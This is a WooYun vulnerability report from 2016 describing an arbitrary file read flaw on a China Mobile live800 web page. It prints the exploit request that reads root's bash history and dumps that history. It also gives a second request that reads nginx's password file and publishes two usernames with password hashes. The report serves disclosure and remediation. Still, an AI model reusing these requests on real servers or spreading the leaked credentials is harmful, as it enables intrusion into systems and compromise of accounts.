当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0198788

漏洞标题:中国移动某站任意文件读取

相关厂商:中国移动

漏洞作者: 小川

提交时间:2016-04-21 13:30

修复时间:2016-06-09 16:20

公开时间:2016-06-09 16:20

漏洞类型:敏感信息泄露

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-21: 细节已通知厂商并且等待厂商处理中
2016-04-25: 厂商已经确认,细节仅向厂商公开
2016-05-05: 细节向核心白帽子及相关领域专家公开
2016-05-15: 细节向普通白帽子公开
2016-05-25: 细节向实习白帽子公开
2016-06-09: 细节向公众公开

简要描述:

中国移动某站任意文件读取

详细说明:

root权限,可以读取历史命令
http://**.**.**.**/live800/downlog.jsp?path=/&fileName=/root/.bash_history
cd
cd
ls
cd /
find ./ -name 'nginx*'
cd ./usr/local/nginx
ls
cd sbin
ls
./nginx -v
ps -ef|grep nginx
cd ..
ls
cd conf
ls
cat nginx.conf
vi nginx.conf
ls
cd ..
ls
cd sbin
ls
./nginx
ifconfig -a
ls
cd ..
ls
cd conf
ls
vi nginx.conf
ls
ps -ef|grep nginx
cd ..
ls
cd bin
cd sbin
ls
./nginx -s reload
ps -ef|grep nginx
ps -ef|grep nginx
./nginx -s stop
ps -ef|grep nginx
./nginx
ps -ef|grep nginx
ifconfig -a
ls
export TMOUT=0
ls
cd /
find ./ -name 'nginx'
cd usr
cd local
cd nginx
ls
cd conf
ls -ltr |wc -l
ls
ls -ltr
cat nginx.conf.default
ls
pwd
ifconfig -a
cd ..
ls
cd html
ls
cd ..
ls
pwd
cd html
ls
cd ..
ls
find ./ -name 'emapdomains*'
cd client_body_temp
ls
cd ..
ls
cd fastcgi_temp
ls
cd ..
ls
cd proxy_temp
ls
cat 1
cd 1
ls
file 00
cd 00
ls
cd ..
ls
cd ..
ls
cd ..
ls
cd scgi_temp
ls
cd ..
ls
cd uwsgi_temp
ls
cd ..
ls
cd on
ls
cd conf
ls
ls -ltr
cat mime.types
ls -ltr|wc -l
ls -ltr
cd
cd etc
cd /etc
ls
cat hosts
cat resolv.conf
cd /usr/local
cd nginx
ls
cd conf
ls
cat nginx.conf
cat upstream.conf
cat nginx.conf
ls
more proxy.conf
ls -ltr
cat proxy.conf
ls -ltr
cat upstream.conf
cd
ls
cd /
find ./ -name '*emapdomains*'
ls
cd /usr/local
ls
cd nginx
ls
cd conf
ls
grep emapdomains *
ls
cd ..
ls
cd logs
ls
pwd
cd ..
ls
cd conf
ls
ls
pwd
ifconfig -a
ls
cd ..
ls
tar cvf ../nginx_conf_byld_20160113.tar conf
ls
cd ..
ls
ls
export TMOUT=0
ls
ps -ef|grep nginx
cd /
find ./ -name
find ./ -name 'nginx*'
pwd
find ./ -name '**.**.**.**'
cd /usr/local
cd nginx
ls
cd conf
ls
cat nginx-conf
ifconfig -a
ls -ltr
cd key
ls
cd ..
ls
cat ngx_passwd
pwd
cd /usr
ls
cd local
ls
cd bushu
cd nginx
ls
cd
cd /
ls
find ./ -name 'configure'
more ./home/Nginx/pcre-8.35/configure
!
ls
ls
ls
cd
ls
cd ..
ls
cd /usr
ls
cd local
ls
cd sbin
ls
cd ..
ls
cd nginx
ls
cd conf
ls
cd ..
ls
cd logs
ls
ls -ltr
cd data
ls
cat *
cd
ls
ls
cd /usr
cd local
ls
cd nginx
ls
cd conf
ls
cat upstaream.conf
more upstream.conf
ls
more nginx.conf
ls
more upstream.conf
cd ..
ls
cd sbin
ls
./nginx
ps -ef|grep nginx
export TMOUT=0
cd /usr/local/nginx
cd /etc/init.d
ls
cd ..
vi hosts
cd /usr/local/nginx
ls
cd conf/
ls
cat upstream.conf
cd /etc/init.x
cd /etc/init.d
vi nginx
ps -ef | grep ngixn
ps -ef | grep nginx
cd /usr/local
ls
cd nginx
ls
cd conf
ls
ls -ltr
more nginx.conf

vi nginx.conf
ifconfig
exit
cd /usr/local
ls
cd nginx
ls
pwd
cd html
ls
ls -ltr
cd ../conf
ls
vi nginx.conf
ifconfig
cd /usr/local
ls
cd nginx
ls
ls -ltr
cd conf
ls
vi nginx.conf
ls
cd /usr
cd local
ls
cd nginx
ls
ps -ef|grep nginx
cd logs
ls -ltr
tail -f access-bassapp.log
ls -ltr
grep mbomc access-bassapp.log
grep mbomc access.log
cd ..
ls
cd conf
ls
vi nginx.conf
;s
ls
cd /usr
cd local
ls
cd nginx
ls
cd logs
ls -ltr
tail -f access.log
ls -ltr
tail -10000f access-mbomc.log
cd /usr
cd local
cd nginx
ls
cd sbin
ls
./nginx -s reload
ps -ef|grep nginx
cd /
find ./ -name 'Squid'
find ./ -name Squid
find ./ -name squid
ps -ef|grep squid
export TMOUT=0
ls
cd /usr
ls
cd local
ls
cd nginx
ls
cd conf
ls
vi nginx.conf
vi nginx.conf
ls
cd ..
ls
ls
export TMOUT=0
ls
cd conf
ls
ls -ltr
exit
ls
ls -ltr
ls
cd /usr
ls
cd local
ls
cd nginx
ls
cd conf
ls
vi nginx.conf
ls
cd ../sbin
ls
./nginx -s stop
vi /usr/local/nginx/conf/nginx.conf
ps -ef|grep nginx
exit
ls
export TMOUT=0
ls
cd /usr
ls
cd local
ls
cd nginx
cd conf
ls
vi upstream.conf
pwd
ifconfig -a
pwd
cd ../sbin
ls
./nginx -s stop
ps -ef|grep nginx
ls
cd ..
ls
cd conf
ls
vi upstream.conf
cd ../sbin
ls
./nginx -s stop
cd ../conf
ls
vi upstream.conf
cd ../sbin
ls
./nginx -s stop
ps -ef|grep nginx
pwd
/usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf
ps -ef|grep nginx
exit
ls
cd /usr/local
cd nginx
cd conf
vi nginx.conf
cd ../sbin
./nginx -s reload
ps -ef|grep nginx
cd /usr/local/nginx
cd conf/
vi nginx.conf
vi nginx.conf
cd ../sbin/
ls
./nginx -s reload
vi ../conf/nginx.conf
./nginx -s reload
cd ../conf/
ls
vi upstream.conf
vi ../conf/nginx.conf
cd ../sbin/
./nginx -s reload
exit
ipconfig -a
ipfongi
ipconfig
ifconfig
uname -a
top
ifconfig
ls
uname -a
ps
ssh root@**.**.**.**
ls -ltr
ls -ltr /usr/local/nginx/sbin/nginx*
/usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf
ps -ef|grep nginx.conf
ps -ef|grep nginx
cd
ls
cd ..
ls
cd /home
ls
cd live800
ls
cat startLive800Server.sh
./startLive800Server.sh
ps -ef|grep tomcat
ifconfig
ifconfig |more
netstat -rn
ping **.**.**.**
ssh **.**.**.**
who
ls
cd /
find ./ -name squid
cd ./etc/squid
ls
pwd
cd ./usr/sbin/
cd /
cd ./usr/sbin/
ls
./usr/sbin/squid -s
cd /
/usr/sbin/squid -s
ps -ef|grep squid
ps -ef|grep squid
ps -ef|grep squid
ps -ef|grep squid
ps -ef|grep squid
ps -ef|grep squid
ps -ef|grep squid
ps -ef|grep squid
ps -ef|grep squid
ps -ef|grep squid
ps -ef|grep squid
exit
cd /
find ./ -name 'squid'
/usr/sbin/squid -s
ps -ef|grep squid
ls
ps -ef|grep nginx
cd /usr/local/nginx/conf/
ls
more nginx.conf
ls
more nginx.conf
exit
cd /usr/local/nginx
ls
cd conf/
vi nginx.conf
cd ../sbin
./nginx -s reload
cd ..logs
cd ../logs
ls
tail -f access.log
cd ..
cd conf/
ls
vi upstream.conf
cd ../sbin/
./nginx -s reload
exit
ls
ls
cd
ls
ps -ef|grep nginx
cd /usr/local/nginx/conf/
ls
more nginx.conf
ls
cd
ls
ls
ps -ef|grep nginx
/usr/local/nginx/sbin/nginx -s reload
ps -ef|grep nginx
exit
ls
ps -ef|grep nginx
cd /usr/local/nginx/conf/
ls
cd ..
ls
cd logs
ls
ls -ltr
tail -f access.log
ping **.**.**.**
tail -f access-mbomc.log
ping **.**.**.**
ping **.**.**.**
ls
export TMOUT=0
ls
cd
ls
ps -ef|grep nginx
cd /usr/local/nginx/conf/
ls
ls -ltr
cd ..
ls
cd logs
ls
ls -ltr
tail -1000f access-mbomc.log
LS
ls
ls -ltr
tail -f access-mbomc.log
ls
ls -ltr
tail -f access-mbomc.log
ls -ltr
ipconfig -a
ifconfig -a
ssh root@**.**.**.**
ssh root@**.**.**.**
cd
ls
cd /usr/local/nginx
ls
cd conf
ls
more nginx.conf
ls
ifconfig -a
uname -a
ls
pwd
cd /home
ls
cd live800
ls
cd working
ls
cd tomcat
ls
ls
cd /
find ./ -name 'live800'
cd ./home/live800
ls
cd ./home/live800/working/tomcat/live800
ls
cd working
ls
cd tomcat
ls
cd ..
ls
cd ..
ls
more startLive800Server.sh
cd ../tomcat/
ls
cd working
ls
cd tomcat
ls
ls -ltr
cd webapps
ls
cd live800
ls
pwd
cd /home/live800/working/tomcat/webapps/live800
cd live800
]
ifconfig -a
uname
cd /home
ls
cd /live800
cd live800
ls
startLive800Server.sh
sh startLive800Server.sh
ps -ef|grep live800
ps -ef|grep nginx
cd /usr/local
ls
ls
cd /usr/local
ls
cd gninx
cd nginx
ls
cd sbin
ls
pwd
export TMOUT=0
cd ..
ls
cd conf
ls
pwd
cd
/usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf
ps -ef|grep nginx
ls
cd /home
cd live800
ls
ls -ltr
cd working
ls
ftp **.**.**.**
cd /home
cd live800
ls
cd /work
cd /working
ls
cd working
ls
cd tomcat
ls
cd live800
ls
cd chatClient
ls
cd chinamobile
ls
cd scripts
ls -F
cd chatbox.js
ls
ls -F
ls -l
cd
ls
cd /home
ls
cd live800
ls
cd working
ls
cd tomcat
ls
cd tomcat
ls
cd ..
ls
cd tomcat
ls
cd webapps
ls
ls -ltr
cd live800
ls
ls -ltr zxkf_index.jsp
ls -ltr *index.jsp*
more index.jsp
more showAccount.jsp
more showAccount.jsp
ls -ltr chatbox.jsp
ls
cd chatClient
ls
more chatbox.htm
ls
ps -ef|grep nginx
cd /usr/local/nginx/conf/
more nginx.conf
ls
ls -ltr
ps -ef|grep nginx
cd /usr/local/nginx/conf/
ls
vi nginx.conf
cd ..
ls
cd sbin
ls
./nginx -s reload
ps -ef|grep nginx
exit
ps -ef | grep ngix
ps -ef | grep ng
ps -ef|grep nginx
cat /usr/local/nginx/conf/nginx.conf
env
ls
find . -name | grep 'index2'
find . -name *.* | grep 'index2'
find . -name 'index2'
find . -name 'index2'pwd
cd ..
ls
find . -name 'index2'
find . -name 'index2.jsp'
cat ./sys/devices/system/cpu/cpu15/cache/index2
cd ./sys/devices/system/cpu/cpu15/cache/index2
ls
cd ..
ls
cd
cd ..
ls
find . -name 'index2.jsp'
cd /home
cd /live800
ls
cd live800
ls
cd working
ls -l
cd tomcat
ls -l
cd webapps
ls
cd live800
ls -l
ls
ls
ls
cd /home
ls
cd live800
ls
cd working
ls
ps -ef|grep nginx
cd /usr/local/nginx/sbin/
./nginx -s reload
export TMOUT=0
./nginx -s reload
ls
cd ..
ls
cd conf
ls
vi nginx.conf
cd ..
ls
cd sbin
./nginx -s reload
cd ..
cd conf
ls
vi nginx.conf
ls
cd /dev
ls
cd shm
ls
cdls
cd
ls
ps -ef|grep nginx
cd /usr/local/nginx/conf/
ls
vi nginx.conf
vi proxy.conf
ls
cd cache
cd /cache
ls
cd proxy_temp_path
ls
ls -ltr
pwd
ls -ltr
rm *
ls
cd ..
ls
cd proxy_cache_path
ls
du -sm *
cd 0
ls
cd 00
ls
ifconfig
exit
ls
ls
ps -ef|grep nginx
cd /usr/local/nginx/sbin/
ls
./nginx -s reload
ls
ps -ef|grep nginx
pwd
cd ..
ls
cd client_body_temp
ls
cd ..
ls
cd fastcgi_temp
ls
cd ..
ls
cd html
ls
cd images
ls
cd ..
ls
cd ..
ls
cd on
cd proxy_temp
ls
file 1
cd 1
ls
file *
cd 00
ls
cd ..
ls
cd ..
ls
cd ..
ls
cd scgi_temp
ls
cd ..
ls
cd uwsgi_temp
ls
cd
export TMOUT=0
ssh **.**.**.**
ls
ps -ef | grep nginx
cat /usr/local/nginx/conf/nginx.conf
ls
pwd
ls -A
cd /home
ls
cd /live800
find ./ 'live800'

e ff
ls
sd ..
cd ..
pwd
cd /SDSSO/WebSSO/zxkf/zxkf_index.jsp
find ./'zxkf_index.jsp'
exit
ls
cd /home/live800/working/tomcat/webapps/live800
ls
cd /home/live800/working/tomcat/webapps/live800
ls
find .-name zxkf_index.jsp
cd ..
ls
cd ..
cd ..
ls
pwd
cd ..
cd ..
ls
pwd
cd .
ls
cd ..
find .-name zxkf_index.jsp
cd /home/live800/working/tomcat
ls
cd /restartTomcat.sh
exit
ls
pwd
/home/live800/working/
cd /home
ls
cd /live800
/home/live800/working/tomcat/webapps/live800
cd /home/live800/working/tomcat/webapps/live800
ps -ef|grep live800
ls
cd /home/live800
ls
cd /working
cd /home/live800/working/tomcat/webapps/live800
ps -ef|grep "live800"
ls
pwd
ps -ef|grep live800
ls
pwd
ls -f
find -name/ live800
find
ls
pwd
cd /home
ls
cd /weblogic
pwd
ps -ef| grep live800
ls -A
ls -a
ls
cd /home/live800/working/tomcat/restartTomcat.sh
cd /home/live800/working/tomcat/
ls
ls -a
pwd
find /-name live800
ls
cd /live800
find /-name "zxkf_index.jsp"
pwd
cd..
cd ..
cd
pwd
history 20
history 50
exit
ls
history 50
ls
pwd
ls -A
cd /SDSSO/WebSSO/zxkf/zxkf_index.jsp
cd /SDSSO
ls
ls
ls -a
看到个http://**.**.**.**/live800/downlog.jsp?path=/&fileName=/usr/local/nginx/conf/ngx_passwd
zhangyong:2RsUTTsvOmOdA
zengqh:DunTiVFkBxz7A
应该该是nginx的登录密码

漏洞证明:

修复方案:

升级

版权声明:转载请注明来源 小川@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2016-04-25 16:18

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无


漏洞评价:

评价

  1. 2016-04-21 14:20 | Dotaer ( 路人 | Rank:24 漏洞数:8 | 多学习,多挖洞!)

    前排求关注!

  2. 2016-04-21 15:47 | 变色龙 ( 路人 | Rank:2 漏洞数:2 | 好好学习,天天向上。)

    泄露啥重要资料?

  3. 2016-05-22 09:35 | sutdy ( 普通白帽子 | Rank:113 漏洞数:37 | 0.0)

    提醒:级别足够但是无法查看 Rank 高于自己的白帽子漏洞 ( 可以等待进一步公开或者支付 4 个乌云币提前查看